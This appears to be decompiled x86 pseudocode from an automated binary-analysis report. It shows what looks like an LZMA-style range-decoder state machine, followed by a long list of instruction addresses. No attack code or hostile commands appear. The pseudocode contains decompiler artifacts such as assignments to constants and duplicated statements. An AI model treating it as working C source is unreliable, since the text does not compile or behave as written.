                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t122 = __ebp - 0x70;
                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t122;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L39:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            												goto L48;
                                                            											}
                                                            											L40:
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												goto L54;
                                                            											}
                                                            											L41:
                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            											 *(__ebp - 0x48) = __eax;
                                                            											__eax = __eax + 1;
                                                            											__eax = __eax << 8;
                                                            											__eax = __eax + __ebx;
                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edx = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												 *(__ebp - 0x40) = 1;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												__ebx = __ebx + __ebx + 1;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edx;
                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L39;
                                                            											} else {
                                                            												L45:
                                                            												goto L37;
                                                            											}
                                                            										case 0xe:
                                                            											L46:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L160:
                                                            												 *(__ebp - 0x88) = 0xe;
                                                            												goto L170;
                                                            											}
                                                            											L47:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t156 = __ebp - 0x70;
                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t156;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											while(1) {
                                                            												L48:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													break;
                                                            												}
                                                            												L49:
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t170 = __edx + 1; // 0x1
                                                            													__ebx = _t170;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													continue;
                                                            												} else {
                                                            													L53:
                                                            													goto L46;
                                                            												}
                                                            											}
                                                            											L54:
                                                            											_t173 = __ebp - 0x34;
                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            											__eflags =  *_t173;
                                                            											goto L55;
                                                            										case 0xf:
                                                            											L58:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L161:
                                                            												 *(__ebp - 0x88) = 0xf;
                                                            												goto L170;
                                                            											}
                                                            											L59:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t203 = __ebp - 0x70;
                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t203;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L60:
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												L55:
                                                            												__al =  *(__ebp - 0x44);
                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            												goto L56;
                                                            											}
                                                            											L61:
                                                            											__eax =  *(__ebp - 0x58);
                                                            											__edx = __ebx + __ebx;
                                                            											__ecx =  *(__ebp - 0x10);
                                                            											__esi = __edx + __eax;
                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edi = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												_t217 = __edx + 1; // 0x1
                                                            												__ebx = _t217;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edi;
                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L60;
                                                            											} else {
                                                            												L65:
                                                            												goto L58;
                                                            											}
                                                            										case 0x10:
                                                            											L109:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L165:
                                                            												 *(__ebp - 0x88) = 0x10;
                                                            												goto L170;
                                                            											}
                                                            											L110:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t365 = __ebp - 0x70;
                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t365;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											goto L111;
                                                            										case 0x11:
                                                            											L69:
                                                            											__esi =  *(__ebp - 0x58);
                                                            											 *(__ebp - 0x84) = 0x12;
                                                            											goto L132;
                                                            										case 0x12:
                                                            											L128:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												L131:
                                                            												__eax =  *(__ebp - 0x58);
                                                            												 *(__ebp - 0x84) = 0x13;
                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                            												L132:
                                                            												 *(_t644 - 0x54) = _t642;
                                                            												goto L133;
                                                            											}
                                                            											L129:
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											__eflags = __eax;
                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            											goto L130;
                                                            										case 0x13:
                                                            											L141:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												L143:
                                                            												_t469 = __ebp - 0x58;
                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            												__eflags =  *_t469;
                                                            												 *(__ebp - 0x30) = 0x10;
                                                            												 *(__ebp - 0x40) = 8;
                                                            												L144:
                                                            												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                            												L145:
                                                            												 *(_t644 - 0x50) = 1;
                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                            												goto L149;
                                                            											}
                                                            											L142:
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											 *(__ebp - 0x30) = 8;
                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            											L130:
                                                            											 *(__ebp - 0x58) = __eax;
                                                            											 *(__ebp - 0x40) = 3;
                                                            											goto L144;
                                                            										case 0x14:
                                                            											L156:
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            											__eax =  *(__ebp - 0x80);
                                                            											while(1) {
                                                            												L140:
                                                            												 *(_t644 - 0x88) = _t537;
                                                            												goto L1;
                                                            											}
                                                            										case 0x15:
                                                            											L91:
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            											__al = __al & 0x000000fd;
                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            											goto L120;
                                                            										case 0x16:
                                                            											goto L0;
                                                            										case 0x17:
                                                            											while(1) {
                                                            												L145:
                                                            												 *(_t644 - 0x50) = 1;
                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                            												goto L149;
                                                            											}
                                                            										case 0x18:
                                                            											goto L146;
                                                            										case 0x19:
                                                            											L94:
                                                            											__eflags = __ebx - 4;
                                                            											if(__ebx < 4) {
                                                            												L98:
                                                            												 *(__ebp - 0x2c) = __ebx;
                                                            												L119:
                                                            												_t393 = __ebp - 0x2c;
                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            												__eflags =  *_t393;
                                                            												L120:
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												__eflags = __eax;
                                                            												if(__eax == 0) {
                                                            													L166:
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            													goto L170;
                                                            												}
                                                            												L121:
                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                            													goto L171;
                                                            												}
                                                            												L122:
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            												__eax =  *(__ebp - 0x30);
                                                            												_t400 = __ebp - 0x60;
                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            												__eflags =  *_t400;
                                                            												goto L123;
                                                            											}
                                                            											L95:
                                                            											__ecx = __ebx;
                                                            											__eax = __ebx;
                                                            											__ecx = __ebx >> 1;
                                                            											__eax = __ebx & 0x00000001;
                                                            											__ecx = (__ebx >> 1) - 1;
                                                            											__al = __al | 0x00000002;
                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                            											__eflags = __ebx - 0xe;
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											if(__ebx >= 0xe) {
                                                            												L97:
                                                            												__ebx = 0;
                                                            												 *(__ebp - 0x48) = __ecx;
                                                            												L102:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													L107:
                                                            													__eax = __eax + __ebx;
                                                            													 *(__ebp - 0x40) = 4;
                                                            													 *(__ebp - 0x2c) = __eax;
                                                            													__eax =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                            													__eflags = __eax;
                                                            													L108:
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x58) = __eax;
                                                            													 *(__ebp - 0x50) = 1;
                                                            													 *(__ebp - 0x44) = 0;
                                                            													 *(__ebp - 0x48) = 0;
                                                            													L112:
                                                            													__eax =  *(__ebp - 0x40);
                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            														L118:
                                                            														_t391 = __ebp - 0x2c;
                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            														__eflags =  *_t391;
                                                            														goto L119;
                                                            													}
                                                            													L113:
                                                            													__eax =  *(__ebp - 0x50);
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__esi = __edi + __eax;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__ax =  *__esi;
                                                            													__ecx = __ax & 0x0000ffff;
                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                            														__ecx = 0;
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            														__ecx = 1;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            														__ebx = 1;
                                                            														__ecx =  *(__ebp - 0x48);
                                                            														__ebx = 1 << __cl;
                                                            														__ecx = 1 << __cl;
                                                            														__ebx =  *(__ebp - 0x44);
                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                            														__cx = __ax;
                                                            														__cx = __ax >> 5;
                                                            														__eax = __eax - __ecx;
                                                            														__edi = __edi + 1;
                                                            														__eflags = __edi;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            														 *__esi = __ax;
                                                            														 *(__ebp - 0x50) = __edi;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __edx;
                                                            														0x800 = 0x800 - __ecx;
                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            														 *__esi = __dx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L111:
                                                            														_t368 = __ebp - 0x48;
                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                            														__eflags =  *_t368;
                                                            														goto L112;
                                                            													} else {
                                                            														L117:
                                                            														goto L109;
                                                            													}
                                                            												}
                                                            												L103:
                                                            												__ecx =  *(__ebp - 0xc);
                                                            												__ebx = __ebx + __ebx;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													__ebx = __ebx | 0x00000001;
                                                            													__eflags = __ebx;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													L101:
                                                            													_t338 = __ebp - 0x48;
                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                            													__eflags =  *_t338;
                                                            													goto L102;
                                                            												} else {
                                                            													L106:
                                                            													goto L99;
                                                            												}
                                                            											}
                                                            											L96:
                                                            											__edx =  *(__ebp - 4);
                                                            											__eax = __eax - __ebx;
                                                            											 *(__ebp - 0x40) = __ecx;
                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            											goto L108;
                                                            										case 0x1a:
                                                            											L56:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												L162:
                                                            												 *(__ebp - 0x88) = 0x1a;
                                                            												goto L170;
                                                            											}
                                                            											L57:
                                                            											__ecx =  *(__ebp - 0x68);
                                                            											__al =  *(__ebp - 0x5c);
                                                            											__edx =  *(__ebp - 8);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            											 *( *(__ebp - 0x68)) = __al;
                                                            											__ecx =  *(__ebp - 0x14);
                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                            											__eax = __ecx + 1;
                                                            											__edx = 0;
                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t192;
                                                            											goto L80;
                                                            										case 0x1b:
                                                            											L76:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												L163:
                                                            												 *(__ebp - 0x88) = 0x1b;
                                                            												goto L170;
                                                            											}
                                                            											L77:
                                                            											__eax =  *(__ebp - 0x14);
                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                            												__eflags = __eax;
                                                            											}
                                                            											__edx =  *(__ebp - 8);
                                                            											__cl =  *(__eax + __edx);
                                                            											__eax =  *(__ebp - 0x14);
                                                            											 *(__ebp - 0x5c) = __cl;
                                                            											 *(__eax + __edx) = __cl;
                                                            											__eax = __eax + 1;
                                                            											__edx = 0;
                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t275;
                                                            											__eax =  *(__ebp - 0x68);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											_t284 = __ebp - 0x64;
                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                            											__eflags =  *_t284;
                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                            											L80:
                                                            											 *(__ebp - 0x14) = __edx;
                                                            											goto L81;
                                                            										case 0x1c:
                                                            											while(1) {
                                                            												L123:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													break;
                                                            												}
                                                            												L124:
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t414;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            												__eflags =  *(__ebp - 0x30);
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												 *(__ebp - 0x14) = _t414;
                                                            												if( *(__ebp - 0x30) > 0) {
                                                            													continue;
                                                            												} else {
                                                            													L127:
                                                            													L81:
                                                            													 *(__ebp - 0x88) = 2;
                                                            													goto L1;
                                                            												}
                                                            											}
                                                            											L167:
                                                            											 *(__ebp - 0x88) = 0x1c;
                                                            											goto L170;
                                                            									}
                                                            								}
                                                            								L171:
                                                            								_t539 = _t538 | 0xffffffff;
                                                            								goto L172;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}















                                                            0x00407087
                                                            0x00407087
                                                            0x00000000
                                                            0x00000000
                                                            0x004070ab
                                                            0x004070ab
                                                            0x004070af
                                                            0x00000000
                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040711c
                                                            0x0040711c
                                                            0x00407120
                                                            0x00407127
                                                            0x00407127
                                                            0x0040712a
                                                            0x0040712d
                                                            0x00407137
                                                            0x00000000
                                                            0x00407137
                                                            0x00407122
                                                            0x00407122
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x0040715d
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00406df8
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x00407569
                                                            0x00000000
                                                            0x00407569
                                                            0x00406e02
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e20
                                                            0x00406e23
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e29
                                                            0x00406e29
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e60
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e93
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406ef9
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f24
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fbd
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fe8
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fed
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x00000000
                                                            0x00000000
                                                            0x00407395
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x0040739b
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
